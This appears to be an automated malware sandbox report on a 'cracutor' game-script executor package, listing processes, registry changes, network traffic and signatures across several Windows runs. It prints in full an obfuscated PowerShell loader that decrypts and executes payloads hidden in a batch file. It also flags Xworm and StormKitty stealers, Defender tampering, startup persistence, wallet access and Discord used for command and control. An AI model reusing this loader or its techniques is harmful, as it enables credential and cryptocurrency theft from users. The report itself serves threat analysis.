| PID 1288 wrote to memory of 2744 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1288 wrote to memory of 2744 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\cracutor.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zFCOPqZUpxhO5ciHbZM4ROMYeYlSpVgI4g7jD8zHAUY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vDZO0S7Am6YBYCRTxFXCyQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zAiLC=New-Object System.IO.MemoryStream(,$param_var); $YmoSv=New-Object System.IO.MemoryStream; $vqshj=New-Object System.IO.Compression.GZipStream($zAiLC, [IO.Compression.CompressionMode]::Decompress); $vqshj.CopyTo($YmoSv); $vqshj.Dispose(); $zAiLC.Dispose(); $YmoSv.Dispose(); $YmoSv.ToArray();}function execute_function($param_var,$param2_var){ $qmwRL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $dQiwA=$qmwRL.EntryPoint; $dQiwA.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\cracutor.bat';$kqgmW=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\cracutor.bat').Split([Environment]::NewLine);foreach ($RIPei in $kqgmW) { if ($RIPei.StartsWith(':: ')) { $flwkS=$RIPei.Substring(3); break; }}$payloads_var=[string[]]$flwkS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Network
Files
memory/2744-4-0x000007FEF561E000-0x000007FEF561F000-memory.dmp
memory/2744-5-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp
memory/2744-6-0x000000001B340000-0x000000001B622000-memory.dmp
memory/2744-8-0x0000000002310000-0x0000000002318000-memory.dmp
memory/2744-7-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp
memory/2744-9-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp
memory/2744-10-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-19 17:20
Reported
2024-05-19 17:23
Platform
win10v2004-20240508-en
Max time kernel
144s
Max time network
108s
Command Line
Signatures
Processes
C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE
"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\ICSharpCode.AvalonEdit.xml"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 100.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| NL | 23.62.61.89:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
Files
memory/4368-1-0x00007FFCC6CED000-0x00007FFCC6CEE000-memory.dmp
memory/4368-0-0x00007FFC86CD0000-0x00007FFC86CE0000-memory.dmp
memory/4368-2-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp
memory/4368-3-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-19 17:20
Reported
2024-05-19 17:23
Platform
win7-20240508-en
Max time kernel
121s
Max time network
126s
Command Line
Signatures
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe
"C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | scriptblox.com | udp |
| US | 172.67.68.166:443 | scriptblox.com | tcp |
Files
memory/1688-0-0x0000000074B9E000-0x0000000074B9F000-memory.dmp
memory/1688-1-0x0000000000100000-0x00000000002FE000-memory.dmp
memory/1688-2-0x0000000074B90000-0x000000007527E000-memory.dmp
memory/1688-3-0x0000000004C60000-0x0000000004CFE000-memory.dmp
memory/1688-4-0x0000000074B90000-0x000000007527E000-memory.dmp
memory/1688-6-0x00000000005A0000-0x00000000005AA000-memory.dmp
memory/1688-5-0x00000000005A0000-0x00000000005AA000-memory.dmp
memory/1688-7-0x0000000074B9E000-0x0000000074B9F000-memory.dmp
memory/1688-11-0x0000000074B90000-0x000000007527E000-memory.dmp
memory/1688-12-0x0000000074B90000-0x000000007527E000-memory.dmp
memory/1688-14-0x00000000005A0000-0x00000000005AA000-memory.dmp
memory/1688-13-0x00000000005A0000-0x00000000005AA000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-19 17:20
Reported
2024-05-19 17:23
Platform
win7-20240221-en
Max time kernel
121s
Max time network
123s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Plz Donate Bot.txt"
Network
Files
Analysis: behavioral24
Detonation Overview
Submitted
2024-05-19 17:20
Reported
2024-05-19 17:23
Platform
win10v2004-20240508-en
Max time kernel
92s
Max time network
94s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\config.cfig"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-19 17:20
Reported
2024-05-19 17:23
Platform
win7-20240220-en
Max time kernel
117s
Max time network
119s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pdb_auto_file\ | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\.pdb | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\.pdb\ = "pdb_auto_file" | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pdb_auto_file\shell\Read | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pdb_auto_file\shell\Read\command | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pdb_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pdb_auto_file | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pdb_auto_file\shell | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1684 wrote to memory of 2096 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 1684 wrote to memory of 2096 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 1684 wrote to memory of 2096 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2096 wrote to memory of 852 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2096 wrote to memory of 852 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2096 wrote to memory of 852 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2096 wrote to memory of 852 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.pdb"
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.pdb
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.pdb"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 9e37514ff103460380b465d4530d009a |
| SHA1 | 0b8c30d62dae5d576d2c0735abcef15610235982 |
| SHA256 | 1587e9f22c1036b8f1141d5c22a952f77596a4a9ead4c4b60834af0f7c86a78d |
| SHA512 | 8545e952fea421b9be25fbbef423840c6fbb62b7a9ddc16d75b62d50d9a7122c21b42440e3dc171e42c8e0ca176df6fa366deca96361b22d236580bbd047e865 |
Analysis: behavioral22
Detonation Overview
Submitted
2024-05-19 17:20
Reported
2024-05-19 17:23
Platform
win10v2004-20240508-en
Max time kernel
143s
Max time network
133s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\abc.txt"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral23
Detonation Overview
Submitted
2024-05-19 17:20
Reported
2024-05-19 17:23
Platform
win7-20240220-en
Max time kernel
118s
Max time network
120s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\.cfig | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\cfig_auto_file\shell\Read | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\cfig_auto_file\shell | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\cfig_auto_file\shell\Read\command | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\cfig_auto_file | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\cfig_auto_file\ | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\.cfig\ = "cfig_auto_file" | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\cfig_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2080 wrote to memory of 2636 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2080 wrote to memory of 2636 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2080 wrote to memory of 2636 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2636 wrote to memory of 2576 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2636 wrote to memory of 2576 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2636 wrote to memory of 2576 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2636 wrote to memory of 2576 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\config.cfig"
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\config.cfig
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\config.cfig"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 0ea99233b8862c2569f2f4aa8d93831a |
| SHA1 | 28dc72da59fd83ad6f480546e42dafc6ad63bd8b |
| SHA256 | 13296307a84113f8315b21effdedc28f49156cb97b3941aec7791ea2d64c019d |
| SHA512 | 5bfe2e075eabe50f6981a24f18b1a0d04713ef32b91164da0d59b32162ecd1a02f097d6d2de0d9198fbaeba5e30b95469331525645497453bd8f2c4bfef1617a |
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-19 17:20
Reported
2024-05-19 17:23
Platform
win7-20240215-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1256 wrote to memory of 2456 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 1256 wrote to memory of 2456 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 1256 wrote to memory of 2456 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 1256 wrote to memory of 2456 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe.config"
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe.config"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | c98cd428c733d3821e753865ab588677 |
| SHA1 | 7eec31bbf4b870dfdfa3f964c54dbf178c209771 |
| SHA256 | 546d1061ff0bb4d2cfc3257e0178f60981e4f590930c549215b49ae2f031d2b6 |
| SHA512 | 459bec257d97670d8696214da8f816c64081f8f8cb0c7067fd64eda592de82a6e56a45bd0c10a4006da7427996e628d868fe4b33cf5bc4edea02281e33194c75 |
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-19 17:20
Reported
2024-05-19 17:23
Platform
win7-20240215-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Auto Execute\gg.txt"
Network
Files
Analysis: behavioral21
Detonation Overview
Submitted
2024-05-19 17:20
Reported
2024-05-19 17:23
Platform
win7-20240508-en
Max time kernel
122s
Max time network
122s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\abc.txt"
Network
Files
Analysis: behavioral26
Detonation Overview
Submitted
2024-05-19 17:20
Reported
2024-05-19 17:23
Platform
win10v2004-20240508-en
Max time kernel
118s
Max time network
143s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
StormKitty
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\klxcnl.exe | C:\Users\Admin\AppData\Local\Temp\klxcnl.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\klxcnl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\klxcnl.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe | N/A |
